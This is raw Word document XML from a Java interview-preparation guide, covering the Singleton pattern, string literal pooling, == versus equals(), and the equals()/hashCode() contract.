          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a class exists throughout the application and provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global access point</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to that instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46199465" w14:textId="77777777" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71BCB">
      <w:pPr>
        <w:ind w:firstLine="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mmonly used for things like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312022D5"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classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22427140"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er classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697D544C"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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01528A77" w14:textId="270798CA" w:rsidR="00F21583"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 mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BBFD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p w14:paraId="3C1BCDEF"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xml:space="preserve"> – so no other class can instantiate it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09294058"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stance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – holds the single instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EEC50F" w14:textId="3B716B2C" w:rsidR="00F21583"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ublic static method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – provides access to the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C370CF4"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730B6E"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78A47FD"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F88441"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F6BF8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1E791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17E8B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5B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E600"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A65E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2333B82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2C0E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F3615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F2F7C" w14:textId="3A09BA66"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DE3DB8"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hread-Safe Singleton (Synchronized Method):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355E9DA"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F92EAF"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F80A4EC"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43D82B"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995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AFE03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9ABF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872AF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7D878EA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8AFD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4FE27F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EC742" w14:textId="7DC9A2F2"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C8DE7E4" w14:textId="5965D980" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71BCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D94871F"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D35836"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BD89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13C4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D2295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3888B54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9EB031"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DA345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801F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2711532E"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B0C06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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD1640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4540D6"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EF986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7B797E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4BD1A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B8131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doing work..."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC073F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2E20E0"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB0102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D5006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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BD5B2" w14:textId="6A6962F1"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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omething</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30586594" w14:textId="77777777" w:rsidR="00F21583" w:rsidRPr="00CE4B95"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="732A668E" w14:textId="3676822D" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="0051148C" w:rsidP="00E9128D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc197867240"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Consider we have Strings as String s1 = “Welcome”, String s2 = “Welcome” and String s3 = “WelcomeOne”. What does s1==s2 represent</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="0AF93996" w14:textId="3610D6EE" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="00D36F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 in Java compares references, not content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622DDF3"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A97E6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iven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F9473"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29EAD55"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98A9A8C" w14:textId="7D42C068"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649DF1"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1 == s2 → true </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040BFB0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y? Because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA8D74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come" is a String literal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A58E74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literals are stored in the String Pool (a part of the heap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FACCEF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optimizes memory by reusing string literals from the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038C49C6"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both s1 and s2 point to the same memory location in the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F6F052" w14:textId="0EE00D2F" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="176E46E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at about s1.equals(s2)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA26F2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hecks content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8EC1D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returns true, because "Welcome".equals("Welcome").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B06359"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0375C"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 is false if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F3A7C"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1323876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50E6AE2"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27529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 (different memory locations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB50E21" w14:textId="205AFDE3"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08C4BC42"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CE4B95" w14:paraId="5EB6D8C6" w14:textId="77777777" w:rsidTr="0041174E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E76E7F2"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41174E" w:rsidRPr="00CE4B95" w14:paraId="605AAF1E" w14:textId="77777777" w:rsidTr="0041174E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27A6FA53"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pool object)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0041174E" w:rsidRPr="00CE4B95" w14:paraId="15A1B71B" w14:textId="77777777" w:rsidTr="0041174E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11FD0C8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content)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C849C83" w14:textId="3AF75049" w:rsidR="00A4403D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007854FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="66753ECE">
          <v:rect id="_x0000_i1116" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CBED9E" w14:textId="757D21BF" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00253194">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc197867241"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain String constant pool</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="4C823282" w14:textId="736A6A87" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00834B9A">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aka </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Intern Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a special memory area inside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Java stores all string literals</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to optimize memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D87853"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t works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748DA40F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F58E3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25D3BA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DC5680E"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8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Jav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stored only onc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ool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3935AF63"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Both</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s2 will point to the same memory reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B963BAF"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C5B65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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// true (same object)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5898419B" w14:textId="0F94DB00"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7B3C739D"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is the pool stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12079FD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heap memor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eparately managed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498B307A"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Java 7: Stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PermGen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF957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7+: Moved to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap space</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (more flexible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A57AE0"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a new String is created with new:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C379E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277B7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5BB9409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he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utside the pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEF434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s2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rom</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4236E9" w14:textId="4A5D1C86"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ut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31684085"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manually put strings into the pool?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BA643B" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F2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n():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD17399"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n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4C7C5C"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34BD61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FC2B6" w14:textId="0D9A2D0D"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3558C7FF"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String Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD45AD"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Avoids duplicate string literals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7466BA20"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boost</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Comparisons with == are faster than .equals().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149EA83C"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25A8C9FC"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string literals are automatically pooled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57598743"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pool is managed by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 no need for manual cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A6F074" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5152331D" w14:textId="7D760784" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB1EA9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc197867242"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between equals</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hash</w:t>
      </w:r>
      <w:r w:rsidR="004A5252"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w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="29EDB118" w14:textId="0DA4AC95" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95"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CE4B95" w14:paraId="715A83F9" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EAFAEC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Code()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w14:paraId="09872068" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3885C8CA"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 integer hash code for the object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w14:paraId="700577D7" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FF2E297"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r>
      <w:tr w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w14:paraId="65F26398" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CD36BBE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w14:paraId="2C99F9B4" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EE3A31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hash-based collections like HashMap, HashSet, Hashtable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w14:paraId="27089356" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A0D273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to maintain contract</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F090224"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A3E5E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001CC49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2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6AAB81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E64C58F"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FBE72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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE07638"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A24507C"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306E8D"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30DF854"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9FC97F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A5DC1D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9E1D496"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5278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EB3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3961CA"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0696943"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F7F1E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7+ utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5107039B"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8DD19B" w14:textId="29A0B70C"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0CB8215"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4A26B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act between equals() and hashCode():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411C7F66"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different, equals() must return false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE7C841" w14:textId="134E41BB" w:rsidR="00EB39CC"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the same, equals() may still return false (hash collision).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FA2F91"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4" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F48C4D" w14:textId="77777777" w:rsidR="00DB20FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB20FD" w:rsidP="00D92E78">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FFB23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d in Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505AB133" w14:textId="26C7ED42"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CA7B3C"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used to locate the bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE659FA"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find the correct key in the bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7616B9F6"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E9130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If You Only Override equals() but Not hashCode():</w:t>
      </w:r>
    </w:p>
